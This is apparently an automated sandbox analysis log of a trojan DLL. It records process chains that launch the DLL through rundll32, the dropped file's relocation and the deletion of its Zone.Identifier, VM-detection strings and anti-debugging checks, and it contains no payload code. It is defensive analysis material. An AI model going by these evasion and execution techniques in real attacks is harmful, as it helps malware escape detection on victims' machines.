Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C597D	5_2_003C597D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C2575	5_2_003C2575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C2176	5_2_003C2176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003DC772	5_2_003DC772
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C996C	5_2_003C996C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C196D	5_2_003C196D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C9565	5_2_003C9565
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C5166	5_2_003C5166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003CDD66	5_2_003CDD66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003DF561	5_2_003DF561
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003E2560	5_2_003E2560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C635F	5_2_003C635F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C8D59	5_2_003C8D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003E2D4F	5_2_003E2D4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003E314A	5_2_003E314A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003DC145	5_2_003DC145
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C4F42	5_2_003C4F42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C33A9	5_2_003C33A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003D77A7	5_2_003D77A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003DBFA1	5_2_003DBFA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C938F	5_2_003C938F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003CF984	5_2_003CF984
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003E1987	5_2_003E1987
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C7D87	5_2_003C7D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C6BFE	5_2_003C6BFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003DD5FE	5_2_003DD5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C1DF9	5_2_003C1DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003D91F7	5_2_003D91F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003CB7EC	5_2_003CB7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003CFBEF	5_2_003CFBEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003E35E3	5_2_003E35E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003D13DB	5_2_003D13DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003DE7DA	5_2_003DE7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003D89DA	5_2_003D89DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003D4DC5	5_2_003D4DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003D0FC5	5_2_003D0FC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C2DC5	5_2_003C2DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C5DC3	5_2_003C5DC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C39C3	5_2_003C39C3

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6EA9D350 appears 33 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6EA81C10 appears 97 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EA9D350 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EA81C10 appears 97 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: 6zAcNlJXo7.dll	Virustotal: Detection: 23%
Source: 6zAcNlJXo7.dll	ReversingLabs: Detection: 24%

Source: 6zAcNlJXo7.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zsdkqzebleakbz\gnpornwqabjsi.vaq",YawfQDI
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 272
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4668 -ip 4668
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 324
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,axamexdrqyrgb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,bhramccfbdd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zsdkqzebleakbz\gnpornwqabjsi.vaq",YawfQDI	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\6zAcNlJXo7.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4668 -ip 4668	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 272	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4668 -ip 4668	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 324	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C87.tmp

Jump to behavior

Source: classification engine

Classification label: mal72.troj.evad.winDLL@32/18@0/30

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6zAcNlJXo7.dll,Control_RunDLL

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:2824:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:3160:64:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4668

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: 6zAcNlJXo7.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 6zAcNlJXo7.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.602824148.00000000049DE000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.602932789.000000000328A000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.619910392.00000000031BC000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.620547498.00000000031BC000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.605463455.0000000004DB1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.625076490.0000000005351000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.611725686.0000000000912000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000014.00000003.619910392.00000000031BC000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.620547498.00000000031BC000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6005E push esp; iretd	0_2_00A60061
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6150F push ds; ret	0_2_00A61527
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A6151C push ds; ret	0_2_00A61527
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EAA9153 push ecx; ret	0_2_6EAA9166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0097005E push esp; iretd	2_2_00970061
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0097151C push ds; ret	2_2_00971527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0097150F push ds; ret	2_2_00971527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EAA9153 push ecx; ret	2_2_6EAA9166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0051005E push esp; iretd	3_2_00510061
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0051151C push ds; ret	3_2_00511527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0051150F push ds; ret	3_2_00511527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C005E push esp; iretd	5_2_003C0061
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C151C push ds; ret	5_2_003C1527
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_003C150F push ds; ret	5_2_003C1527

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA8E4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

0_2_6EA8E4E0

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Zsdkqzebleakbz\gnpornwqabjsi.vaq

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Zsdkqzebleakbz\gnpornwqabjsi.vaq:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 7116

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EAA2FE7 FindFirstFileExW,		0_2_6EAA2FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EAA2FE7 FindFirstFileExW,		2_2_6EAA2FE7

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Amcache.hve.17.dr	Binary or memory string: VMware
Source: Amcache.hve.17.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: svchost.exe, 00000008.00000002.699954981.0000016264261000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: Amcache.hve.17.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.17.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.17.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.17.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.17.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.17.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: svchost.exe, 00000008.00000002.699887933.000001626424D000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.640632475.0000000004F56000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.642248757.0000000004F57000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.640563575.0000000004F70000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.642284557.0000000004F72000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.17.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.17.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.17.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.17.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: svchost.exe, 00000008.00000002.698194989.000001625EC29000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWM&db
Source: Amcache.hve.17.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: WerFault.exe, 00000014.00000003.639127810.0000000004F42000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.17.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EAA29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6EAA29E6

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA8E4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

0_2_6EA8E4E0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA81290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,

0_2_6EA81290

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00A74315 mov eax, dword ptr fs:[00000030h]	0_2_00A74315
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA9C050 mov eax, dword ptr fs:[00000030h]	0_2_6EA9C050
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA9BFE0 mov esi, dword ptr fs:[00000030h]	0_2_6EA9BFE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EA9BFE0 mov eax, dword ptr fs:[00000030h]	0_2_6EA9BFE0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EAA12CB mov ecx, dword ptr fs:[00000030h]	0_2_6EAA12CB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6EAA298C mov eax, dword ptr fs:[00000030h]	0_2_6EAA298C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00984315 mov eax, dword ptr fs:[00000030h]	2_2_00984315
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EA9C050 mov eax, dword ptr fs:[00000030h]	2_2_6EA9C050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EA9BFE0 mov esi, dword ptr fs:[00000030h]	2_2_6EA9BFE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6EA9BFE0 mov eax, dword ptr fs:[00000030h]	2_2_6EA9BFE0
